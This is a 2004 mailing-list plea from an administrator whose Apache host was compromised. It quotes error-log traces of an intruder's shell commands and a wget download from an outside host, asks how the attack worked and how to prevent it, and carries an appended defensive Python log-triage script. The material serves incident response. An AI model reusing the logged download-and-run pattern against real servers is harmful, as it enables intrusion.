Hi all security gurus,

recently I had a sec. issue with an Apache install. This box is hosting
several virtual domains, one was hacked last night :(

I found this in my apache-error:

===<snip>========================================================
sh: line 1: cd: conf: No such file or directory
sh: line 1: cd: conf: No such file or directory
sh: line 1: cd: conf: No such file or directory
sh: line 1: cd: conf: No such file or directory
sh: line 1: work.txt: Permission denied
cat: /tmp/cmdtemp: No such file or directory
rm: cannot remove `/tmp/cmdtemp': No such file or directory
--00:11:27-- http://www.massdesign.hpg.com.br/index/index2.htt
=> `index2.htt'
Resolving www.massdesign.hpg.com.br... done.
Connecting to www.massdesign.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.massdesign.hpg.ig.com.br/index/index2.htt [following]
--00:11:28-- http://www.massdesign.hpg.ig.com.br/index/index2.htt
=> `index2.htt'
Resolving www.massdesign.hpg.ig.com.br... done.
Connecting to www.massdesign.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 871 [text/plain]

0K 100% 850.59 KB/s

00:11:29 (850.59 KB/s) - `index2.htt' saved [871/871]
===</snip>========================================================

Then some more wgets and this line:

===<snip>========================================================
[Mon Feb 2 00:42:39 2004] [error] [client 201.4.61.139] request failed: erroneous characters after protocol string: HEAD / HTTP\\1.0
===</snip>========================================================

I had to manually restart the webserver this morning, but now I get some of
those:

===<snip>========================================================
[Mon Feb 2 13:54:48 2004] [notice] child pid 151 exit signal Segmentation fault (11)
[Mon Feb 2 13:55:13 2004] [notice] child pid 155 exit signal Segmentation fault (11)
[Mon Feb 2 13:56:09 2004] [notice] child pid 152 exit signal Segmentation fault (11)
[Mon Feb 2 13:56:36 2004] [notice] child pid 2321 exit signal Segmentation fault (11)
[Mon Feb 2 13:58:10 2004] [notice] child pid 2391 exit signal Segmentation fault (11)
[Mon Feb 2 13:58:46 2004] [notice] child pid 107 exit signal Segmentation fault (11)
[Mon Feb 2 13:59:07 2004] [notice] child pid 2358 exit signal Segmentation fault (11)
[Mon Feb 2 13:59:08 2004] [notice] child pid 106 exit signal Segmentation fault (11)
[Mon Feb 2 14:00:04 2004] [notice] child pid 104 exit signal Segmentation fault (11)
[Mon Feb 2 14:00:43 2004] [notice] child pid 154 exit signal Segmentation fault (11)
[Mon Feb 2 14:01:06 2004] [notice] child pid 105 exit signal Segmentation fault (11)
===</snip>========================================================

... and more and more ...

Until I can update the webserver, I need to know 3 things:
1.) how could this guy(s) get access to this machine,
2.) how can one get shell access after exploiting Apache, and
3.) how to prevent similar attacks in the future?
|
77 |
ANY hints, tips, links and suggestions are welcome! |
78 |
Greetings and TIA, Matthias |
79 |
|
80 |
-- |
81 |
Man: You must be stupider than you look. |
82 |
|
83 |
Homer: Stupider like a fix! |
84 |
|
85 |
Lemon of Troy |
86 |
|
87 |
|
88 |
-- |
89 |
gentoo-security@g.o mailing list |
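A defender-side triage script for the kind of error_log quoted in the post above, added here as an example and not part of the original mail: it separates lines Apache itself wrote from stray child-process output (the sh:, cat:, rm: and wget lines, which show that something ran commands as the server user), pulls out the malformed-request error together with its client address, and groups the child segfaults into bursts. The sample log, the IP address and the hostname in it are constructed placeholders, and the three-in-five-minutes burst threshold is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the shape of the quoted error_log (host and IP are placeholders).
SAMPLE_LOG = r"""sh: line 1: cd: conf: No such file or directory
sh: line 1: work.txt: Permission denied
--00:11:27-- http://www.example.invalid/index/index2.htt
[Mon Feb 2 00:42:39 2004] [error] [client 203.0.113.5] request failed: erroneous characters after protocol string: HEAD / HTTP\\1.0
[Mon Feb 2 13:54:48 2004] [notice] child pid 151 exit signal Segmentation fault (11)
[Mon Feb 2 13:55:13 2004] [notice] child pid 155 exit signal Segmentation fault (11)
[Mon Feb 2 13:56:09 2004] [notice] child pid 152 exit signal Segmentation fault (11)
"""

# Apache 1.3 error_log entry: [timestamp] [level] [client ip] message  (client part is optional)
ENTRY = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$")
SEGV = re.compile(r"child pid (\d+) exit signal Segmentation fault \(11\)")
MALFORMED = "erroneous characters after protocol string"

def parse_entry(line):
    """Return (ts, level, client, msg) for an Apache-format line, else None."""
    m = ENTRY.match(line)
    if not m:
        return None
    return datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["level"], m["client"], m["msg"]

def segfault_bursts(times, threshold=3, window=timedelta(minutes=5)):
    """Cluster segfault timestamps; keep clusters of >= threshold events within window of the first."""
    clusters = []
    for t in sorted(times):
        if clusters and t - clusters[-1][0] <= window:
            clusters[-1].append(t)
        else:
            clusters.append([t])
    return [(c[0], len(c)) for c in clusters if len(c) >= threshold]

def triage(log_text):
    """Bucket each line into the three symptoms the post shows."""
    findings = {"stray_output": [], "malformed_requests": [], "segfaults": []}
    for line in log_text.splitlines():
        entry = parse_entry(line)
        if entry is None:  # not Apache's format: child-process output (sh, cat, rm, wget) leaked into error_log
            findings["stray_output"].append(line)
            continue
        ts, _level, client, msg = entry
        if MALFORMED in msg:
            findings["malformed_requests"].append((client, ts))
        elif SEGV.search(msg):
            findings["segfaults"].append(ts)
    findings["segfault_bursts"] = segfault_bursts(findings["segfaults"])
    return findings
```

Run `triage(open("/var/log/apache/error_log").read())` against a real log; a non-empty `stray_output` list is the strongest of the three signals, since Apache never writes lines in that shape itself.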